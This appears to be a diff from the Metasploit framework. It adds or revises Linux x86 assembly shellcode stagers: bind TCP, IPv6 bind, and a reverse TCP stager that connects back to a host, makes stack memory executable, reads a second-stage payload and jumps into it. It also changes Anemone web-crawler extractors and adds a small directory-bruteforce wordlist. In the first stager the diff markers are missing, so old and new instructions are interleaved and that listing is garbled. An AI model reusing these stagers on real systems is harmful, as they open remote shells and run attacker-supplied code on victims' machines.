; Name: stager_sock_bind
; Qualities: Can Have Nulls
; Version: $Revision: 1607 $
; License:
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; With enhancements from the unixasm project by Ramon de Carvalho Valle
;
; Description:
;
; Implementation of a Linux portbind TCP stager.
@ -32,56 +34,89 @@ BITS 32
GLOBAL _start
_start:
xor ebx, ebx
socket:
push ebx
inc ebx
push ebx
push byte 0x2
push byte 0x66
; int mprotect(const void *addr, size_t len, int prot);
mprotect:
push byte 0x7d ; __NR_mprotect
pop eax
cdq
mov ecx, esp
mov dl, 0x7 ; prot = 7 = PROT_READ | PROT_WRITE | PROT_EXEC
mov ecx, 0x1000 ; len = PAGE_SIZE (on most systems)
mov ebx, esp ; addr
and bx, 0xf000 ; ensure that addr is page-aligned
int 0x80
xchg eax, esi
xor ebx, ebx ; ebx is the call argument to socketcall
mul ebx ; set edx:eax to 0, we'll need them in a minute
; int socket(int domain, int type, int protocol);
socket:
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
inc ebx ; 1 = SYS_SOCKET
push ebx ; type = 1 = SOCK_STREAM
push byte 0x2 ; domain = 2 = AF_INET
mov ecx, esp ; socketcall args
mov al, 0x66 ; __NR_socketcall
int 0x80
; Server socket is now in eax. We'll push it to the stack in a sec and then
; just reference it from there, no need to store it in a register
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
bind:
inc ebx
push edx
push word 0xbfbf ; port: 49087
push bx
mov ecx, esp
push byte 0x66
pop ebx ; 2 = SYS_BIND (this was PF_INET for the call to socket)
pop esi ; 1 = junk - this keeps ecx pointing to the right place
; set up the sockaddr
push edx ; addr->sin_addr = 0 = inet_addr("0.0.0.0")
push 0xbfbf0002 ; addr->sin_port = 0xbfbf
; addr->sin_family = 2 = AF_INET
push byte 0x10 ; addrlen
push ecx ; addr (ecx still points to the right place on the stack)
push eax ; sockfd ; return value from socket(2) above
mov ecx, esp ; socketcall args
push byte 0x66 ; __NR_socketcall
pop eax
push eax
push ecx
push esi
mov ecx, esp
int 0x80
listen:
mov al, 0x66
shl ebx, 1
shl ebx, 1 ; 4 = SYS_LISTEN
mov al, 0x66 ; __NR_socketcall
int 0x80
; At this point the stack will look like this:
;
; [ sockfd ] <-- esp, ecx
; [ addr ] # pointer to below on the stack
; [ addrlen = 0x66 ]
; [ 0xbfbf0002 ] <-- *addr
; [ 0x00000000 ] inet_addr("0.0.0.0")
;
; Since addrlen is ignored if addr is null, we can set esp+4 to NULL and use
; the sockfd that's already on the stack as an argument to accept(2), thus
; avoiding having to set up a full list of args. Conveniently,
; mov [ecx+4], edx
; is three bytes long, whereas the old sequence:
; push edx ; addr = NULL
; push edx ; addrlen = NULL
; push esi ; sockfd
; mov ecx, esp ; socketcall args
; weighs in at 5
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
accept:
push edx
push edx
push esi
inc ebx
mov ecx, esp
mov al, 0x66
inc ebx ; 5 = SYS_ACCEPT
mov al, 0x66 ; __NR_socketcall
mov [ecx+4], edx
int 0x80
xchg eax, ebx
xchg eax, ebx ; client socket is now in ebx
%ifndef USE_SINGLE_STAGE
read:
recv:
mov dh, 0xc
mov al, 0x3
int 0x80
mov edi, ebx ; not necessary if second stages use ebx instead of edi
mov edi, ebx ; not necessary if second stages use ebx instead of edi
; for fd
jmp ecx

113
external/source/shellcode/linux/ia32/stager_sock_bind6.asm vendored Normal file
View File

@ -0,0 +1,113 @@
;;
;
; Name: stager_sock_bind6
; Qualities: Can Have Nulls
; Version: $Revision: 1607 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Implementation of a Linux portbind TCP stager.
;
; File descriptor in edi.
;
; Meta-Information:
;
; meta-shortname=Linux Bind TCP Stager
; meta-description=Listen on a port for a connection and run a second stage
; meta-authors=skape <mmiller [at] hick.org>; egypt <egypt [at] metasploit.com>
; meta-os=linux
; meta-arch=ia32
; meta-category=stager
; meta-connection-type=bind
; meta-name=bind_ipv6_tcp
; meta-path=lib/Msf/PayloadComponent/Linux/ia32/BindStager.pm
;;
BITS 32
GLOBAL _start
_start:
; int mprotect(const void *addr, size_t len, int prot);
mprotect:
push byte 0x7d ; __NR_mprotect
pop eax
cdq
mov dl, 0x7 ; prot = 7 = PROT_READ | PROT_WRITE | PROT_EXEC
mov ecx, 0x1000 ; len = PAGE_SIZE (on most systems)
mov ebx, esp ; addr
and bx, 0xf000 ; ensure that addr is page-aligned
int 0x80
xor ebx, ebx ; ebx is the call argument to socketcall
mul ebx ; set edx:eax to 0, we'll need them in a minute
; int socket(int domain, int type, int protocol);
socket:
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
inc ebx ; 1 = SYS_SOCKET
push ebx ; type = 1 = SOCK_STREAM
push byte 0xa ; domain = 0xa = AF_INET6
mov ecx, esp ; socketcall args
mov al, 0x66 ; __NR_socketcall
int 0x80
; Server socket is now in eax. We'll push it to the stack in a sec and then
; just reference it from there, no need to store it in a register
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
bind:
inc ebx ; 2 = SYS_BIND (this was PF_INET for the call to socket)
; set up the sockaddr
push edx ; addr->sin6_scopeid = 0
push edx ; addr->sin6_addr = inet_pton("::0")
push edx ; ...
push edx ; ...
push edx ; ...
push edx ; addr->flowinfo = 0
push 0xbfbf000a ; addr->sin6_port = 0xbfbf
; addr->sin6_family = 0xa = AF_INET6
mov ecx, esp ; socketcall args
push byte 0x1c ; addrlen
push ecx ; addr
push eax ; sockfd ; return value from socket(2) above
mov ecx, esp ; socketcall args
push byte 0x66 ; __NR_socketcall
pop eax
int 0x80
listen:
shl ebx, 1 ; 4 = SYS_LISTEN
mov al, 0x66 ; __NR_socketcall
int 0x80
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
accept:
inc ebx ; 5 = SYS_ACCEPT
mov al, 0x66 ; __NR_socketcall
mov [ecx+4], edx
int 0x80
xchg eax, ebx
%ifndef USE_SINGLE_STAGE
; ssize_t read(int fd, void *buf, size_t count);
recv:
; fd = ebx
; buf = ecx is pointing somewhere in the stack
mov dh, 0xc ; count = 0xc00
mov al, 0x3 ; __NR_read
int 0x80
mov edi, ebx ; not necessary if second stages use ebx instead of edi
; for fd
jmp ecx
%else
%ifdef FD_REG_EDI
mov edi, ebx
%endif
%endif

58
external/source/shellcode/linux/ia32/stager_sock_reverse.asm vendored
View File

@ -26,48 +26,62 @@
; meta-connection-type=reverse
; meta-name=reverse_tcp
; meta-basemod=Msf::PayloadComponent::ReverseConnection
; meta-offset-lhost=0x11
; meta-offset-lport=0x17
; meta-offset-lhost=0x12
; meta-offset-lport=0x19
;;
BITS 32
GLOBAL _start
_start:
xor ebx, ebx
mul ebx
; int socket(int domain, int type, int protocol);
socket:
push ebx
inc ebx
push ebx
push byte 0x2
push byte 0x66
pop eax
mov ecx, esp
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
inc ebx ; 1 = SYS_SOCKET
push ebx ; type = 1 = SOCK_STREAM
push byte 0x2 ; domain = 2 = AF_INET
mov al, 0x66 ; __NR_socketcall
mov ecx, esp ; socketcall args
int 0x80
xchg eax, edi
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
connect:
pop ebx
push dword 0x0100007f ; ip: 127.0.0.1
push word 0xbfbf ; port: 49087
push bx
mov ecx, esp
push byte 0x66
push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
push 0xbfbf0002 ; addr->sin_port = 49087
; addr->sin_family = 2 = AF_INET
mov ecx, esp ; ecx = addr
push byte 0x66 ; __NR_socketcall
pop eax
push eax
push ecx
push edi
mov ecx, esp
inc ebx
push eax ; addrlen
push ecx ; addr
push edi ; sockfd
mov ecx, esp ; socketcall args
inc ebx ; 3 = SYS_CONNECT
int 0x80
%ifndef USE_SINGLE_STAGE
; int mprotect(const void *addr, size_t len, int prot);
mprotect:
mov dl, 0x7 ; prot = 7 = PROT_READ | PROT_WRITE | PROT_EXEC
mov ecx, 0x1000 ; len = PAGE_SIZE (on most systems)
mov ebx, esp ; addr
shr ebx, 12 ; ensure that addr is page-aligned
shl ebx, 12
mov al, 0x7d ; __NR_mprotect
int 0x80
; ssize_t read(int fd, void *buf, size_t count);
recv:
pop ebx
pop ebx ; sockfd
mov ecx, esp ; buf
cdq
mov dh, 0xc
mov al, 0x3
mov dh, 0xc ; count = 0xc00
mov al, 0x3 ; __NR_read
int 0x80
jmp ecx

10
lib/anemone/core.rb
View File

@ -9,7 +9,7 @@ require 'anemone/storage/base'
module Anemone
VERSION = '0.5.0';
VERSION = '0.5.0'
#
# Convenience method to start a crawl
@ -48,7 +48,7 @@ module Anemone
:cookies => nil,
# basic authentication data to send with HTTP requests
:http_basic_auth => nil,
# array or raw header lines to inject into each request
# array or raw header lines to inject into each request
:inject_headers => [],
# accept cookies from the server and send them back?
:accept_cookies => false,
@ -77,7 +77,7 @@ module Anemone
@skip_link_patterns = []
@after_crawl_blocks = []
@opts = opts
yield self if block_given?
end
@ -277,7 +277,7 @@ module Anemone
false
end
end
#
# Returns +true+ if *link* should not be visited because
# it has a query string and +skip_query_strings+ is true.
@ -301,6 +301,6 @@ module Anemone
@tentacles.each {|t| t.kill rescue nil }
@pages = nil
end
end
end

7
lib/anemone/extractors/anchors.rb Normal file
View File

@ -0,0 +1,7 @@
class Anemone::Extractors::Anchors < Anemone::Extractors::Base
def run
doc.search( '//a[@href]' ).map { |a| a['href'] }
end
end

12
lib/anemone/extractors/dirbuster.rb Normal file
View File

@ -0,0 +1,12 @@
class Anemone::Extractors::Dirbuster < Anemone::Extractors::Base
def run
return [] if page.code.to_i != 200
@@dirs ||= nil
return @@dirs if @@dirs
@@dirs = IO.read( File.dirname( __FILE__ ) + '/dirbuster/directories' ).split( "\n" )
end
end

10
lib/anemone/extractors/dirbuster/directories Normal file
View File

@ -0,0 +1,10 @@
test/
tmp/
stuff/
awstats/
awstats/awstats/
basilic/
cacti/
docs/text/manual.txt
docs/CHANGELOG
docs/html/php_script_server.html

7
lib/anemone/extractors/forms.rb Normal file
View File

@ -0,0 +1,7 @@
class Anemone::Extractors::Forms < Anemone::Extractors::Base
def run
doc.search( '//form[@action]' ).map { |a| a['action'] }
end
end

7
lib/anemone/extractors/frames.rb Normal file
View File

@ -0,0 +1,7 @@
class Anemone::Extractors::Frames < Anemone::Extractors::Base
def run
doc.css( 'frame', 'iframe' ).map { |a| a.attributes['src'].content rescue next }
end
end

50
lib/anemone/extractors/generic.rb Normal file
View File

@ -0,0 +1,50 @@
require 'uri'
class Anemone::Extractors::Generic < Anemone::Extractors::Base
def run
URI.extract( doc.to_s, %w(http https) ).map do |u|
#
# This extractor needs to be a tiny bit intelligent because
# due to its generic nature it'll inevitably match some garbage.
#
# For example, if some JS code contains:
#
# var = 'http://blah.com?id=1'
#
# or
#
# var = { 'http://blah.com?id=1', 1 }
#
#
# The URI.extract call will match:
#
# http://blah.com?id=1'
#
# and
#
# http://blah.com?id=1',
#
# respectively.
#
if !includes_quotes?( u )
u
else
if html.include?( "'#{u}" )
u.split( '\'' ).first
elsif html.include?( "\"#{u}" )
u.split( '"' ).first
else
u
end
end
end
rescue
[]
end
def includes_quotes?( url )
url.include?( '\'' ) || url.include?( '"' )
end
end

7
lib/anemone/extractors/links.rb Normal file
View File

@ -0,0 +1,7 @@
class Anemone::Extractors::Links < Anemone::Extractors::Base
def run
doc.search( "//link[@href]" ).map { |a| a['href'] }
end
end

24
lib/anemone/extractors/meta_refresh.rb Normal file
View File

@ -0,0 +1,24 @@
class Anemone::Extractors::MetaRefresh < Anemone::Extractors::Base
def run
doc.search( "//meta[@http-equiv='refresh']" ).map do |url|
begin
_, url = url['content'].split( ';', 2 )
next if !url
unquote( url.split( '=', 2 ).last )
rescue
next
end
end
rescue
nil
end
def unquote( str )
[ '\'', '"' ].each do |q|
return str[1...-1] if str.start_with?( q ) && str.end_with?( q )
end
str
end
end

Some files were not shown because too many files have changed in this diff Show More